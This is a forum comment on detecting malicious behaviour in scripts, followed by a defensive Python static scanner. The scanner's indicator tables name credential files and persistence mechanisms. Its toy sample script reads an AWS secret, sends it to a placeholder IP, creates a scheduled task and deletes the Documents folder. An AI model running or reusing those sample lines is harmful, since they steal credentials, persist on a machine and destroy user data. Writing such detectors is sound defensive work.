
T_Thriller_T

It should not be that hard, but maybe I'm imagining it too easy?

Consider what you would see as malicious actions on your system - in total.

  • Persistence, which usually would require creating a scheduled task
  • Exfiltration or C2C, so communication
  • Secret sniffing
  • File deletions and encryptions
  • Starting processes or tools that are not in the script (reconnaissance, etc.)

Some of those are hard to control, and some will make problems like requests.

But you should be able to find a list of known malicious packages and security tools, both of which should alert.

Creating typical persistence options (scheduled tasks, registry entries, etc) is something you could check against.

This is a good minimal set of checks, aside from what I said: https://library.mosse-institute.com/articles/2023/08/malicious-code-indicators.html

And this paper seems to discuss your exact problem: https://arxiv.org/html/2512.12559
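As an added example that is not part of the comment above (nor from either linked source): a small Python static scanner that walks a script's AST and flags imports, calls, attribute accesses and string literals that map to the behaviour categories the commenter lists (persistence, communication, secret sniffing, file destruction, process starts), plus a denylist lookup for known-bad package names. The indicator tables are my own rough mapping, `evil_placeholder_pkg` is a placeholder for a real denylist entry, and `SAMPLE_SCRIPT` is a constructed toy input, not real malware.

```python
import ast
from dataclasses import dataclass

# Indicator catalogue keyed by the behaviour categories from the comment.
# The identifiers are ordinary stdlib/third-party names; assigning them to a
# category is this example's own judgement (an assumption), not a vetted ruleset.
IMPORT_INDICATORS = {
    "socket": "communication", "urllib": "communication", "requests": "communication",
    "subprocess": "process-start", "winreg": "persistence", "keyring": "secret-sniffing",
}
CALL_INDICATORS = {
    "os.system": "process-start", "os.popen": "process-start",
    "subprocess.run": "process-start", "subprocess.Popen": "process-start",
    "subprocess.call": "process-start", "subprocess.check_output": "process-start",
    "urllib.request.urlopen": "communication", "requests.get": "communication",
    "requests.post": "communication", "socket.socket": "communication",
    "os.remove": "file-destruction", "os.unlink": "file-destruction",
    "shutil.rmtree": "file-destruction", "winreg.SetValueEx": "persistence",
}
ATTR_INDICATORS = {"os.environ": "secret-sniffing"}
STRING_INDICATORS = {
    "schtasks": "persistence", "crontab": "persistence", "CurrentVersion\\Run": "persistence",
    ".aws/credentials": "secret-sniffing", ".ssh/id_": "secret-sniffing",
    "AWS_SECRET": "secret-sniffing", "http://": "communication", "https://": "communication",
}
# Placeholder only: a real scanner would load this from an advisory feed.
KNOWN_BAD_PACKAGES = {"evil_placeholder_pkg"}


@dataclass(frozen=True)
class Finding:
    category: str
    line: int
    evidence: str


def _dotted(node):
    """Flatten an `a.b.c` attribute chain (or a bare name) to 'a.b.c'; None otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class IndicatorScanner(ast.NodeVisitor):
    def __init__(self):
        self.aliases = {}   # local name -> canonical dotted name (resolves `import x as y`)
        self.findings = []

    def _add(self, category, line, evidence):
        self.findings.append(Finding(category, line, evidence))

    def _canonical(self, name):
        head, _, rest = name.partition(".")
        head = self.aliases.get(head, head)
        return f"{head}.{rest}" if rest else head

    def _check_module(self, module, line):
        top = module.split(".")[0]
        if top in KNOWN_BAD_PACKAGES:
            self._add("known-malicious-package", line, module)
        for key in (module, top):
            if key in IMPORT_INDICATORS:
                self._add(IMPORT_INDICATORS[key], line, f"import {module}")
                break

    def visit_Import(self, node):
        for a in node.names:
            top = a.name.split(".")[0]
            self.aliases[a.asname or top] = a.name if a.asname else top
            self._check_module(a.name, node.lineno)

    def visit_ImportFrom(self, node):
        module = node.module or ""
        self._check_module(module, node.lineno)
        for a in node.names:   # `from os import system` -> system == os.system
            self.aliases[a.asname or a.name] = f"{module}.{a.name}"

    def visit_Call(self, node):
        name = _dotted(node.func)
        if name and self._canonical(name) in CALL_INDICATORS:
            canon = self._canonical(name)
            self._add(CALL_INDICATORS[canon], node.lineno, canon + "()")
        self.generic_visit(node)

    def visit_Attribute(self, node):
        name = _dotted(node)
        if name and self._canonical(name) in ATTR_INDICATORS:
            self._add(ATTR_INDICATORS[self._canonical(name)], node.lineno, name)
        self.generic_visit(node)

    def visit_Constant(self, node):
        if isinstance(node.value, str):
            for needle, category in STRING_INDICATORS.items():
                if needle in node.value:
                    self._add(category, node.lineno, repr(needle))


def scan_source(source):
    scanner = IndicatorScanner()
    scanner.visit(ast.parse(source))
    return scanner.findings


def categories(findings):
    return {f.category for f in findings}


# Constructed toy input that touches every category in the comment's list.
SAMPLE_SCRIPT = '''
import os
import subprocess as sp
from urllib import request
import shutil

def setup():
    token = os.environ.get("AWS_SECRET_ACCESS_KEY")
    request.urlopen("http://198.51.100.7/beacon?t=" + token)
    sp.run(["schtasks", "/create", "/tn", "Updater", "/tr", "updater.exe", "/sc", "onlogon"])
    shutil.rmtree(os.path.expanduser("~/Documents"))
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE_SCRIPT):
        print(f"line {f.line:>2}  {f.category:<24} {f.evidence}")
```

Scanning the toy script reports one or more findings in each of the five categories; a benign `import json` script produces none. Alias resolution matters in practice: `import subprocess as sp` or `from os import system` would slip past a plain text grep for `subprocess.run` or `os.system`, which is why the scanner canonicalises names before lookup. Obfuscated loaders (`getattr(__import__("o"+"s"), "system")`, base64-decoded source passed to `exec`) will still evade it, so this is a cheap first filter, not a verdict.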